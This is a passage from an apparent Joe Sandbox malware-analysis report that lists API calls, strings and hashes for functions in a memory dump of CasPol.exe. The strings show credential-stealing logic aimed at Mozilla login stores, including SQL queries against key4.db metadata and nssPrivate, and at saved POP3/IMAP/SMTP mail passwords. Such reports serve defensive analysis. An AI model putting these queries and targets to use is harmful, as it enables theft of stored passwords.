                                                                                                                                                                                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                  • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                  • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                  • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                  • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                  • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                  • API String ID: 3137614212-1455797042
                                                                                                                                                                                  • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                  • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                  Function 0040DD7B Relevance: 66.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                  • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                  • API String ID: 2814039832-2206097438
                                                                                                                                                                                  • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                  • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                  • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                                                                  Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                    • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                    • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                                                                                                                                                                                    • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                    • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                    • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                  • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                  • API String ID: 4171719235-3943159138
                                                                                                                                                                                  • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                  • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                  • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                  Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                  • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                  • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                  • API String ID: 1703216249-3046471546
                                                                                                                                                                                  • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                  • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                  Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,?,?,?,770145ED,?,00000000), ref: 00402533
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                  • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                  • API String ID: 168965057-606283353
                                                                                                                                                                                  • Opcode ID: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                  • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                  • Opcode Fuzzy Hash: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                  Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                  • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                  • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                  • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                  • API String ID: 1428123949-3474136107
                                                                                                                                                                                  • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                  • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                                  • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                                  Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                  • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00401166
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                  • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2998058495-0
                                                                                                                                                                                  • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                  • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                  Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                    • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                  • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                  • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040BECE
                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                    • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                    • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                  • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                  • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                  • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                  • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                  • API String ID: 2303586283-933021314
                                                                                                                                                                                  • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                  • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                                  • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                                  Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                                                                                  • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                  • API String ID: 231171946-2189169393
                                                                                                                                                                                  • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                  • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                  Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                  • API String ID: 633282248-1996832678
                                                                                                                                                                                  • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                  • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                  Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00406782
                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040686E
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004068EC
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004069B2
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004069CA
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00406A4A
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                  • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • , xrefs: 00406834
                                                                                                                                                                                  • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                  • key4.db, xrefs: 00406756
                                                                                                                                                                                  • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
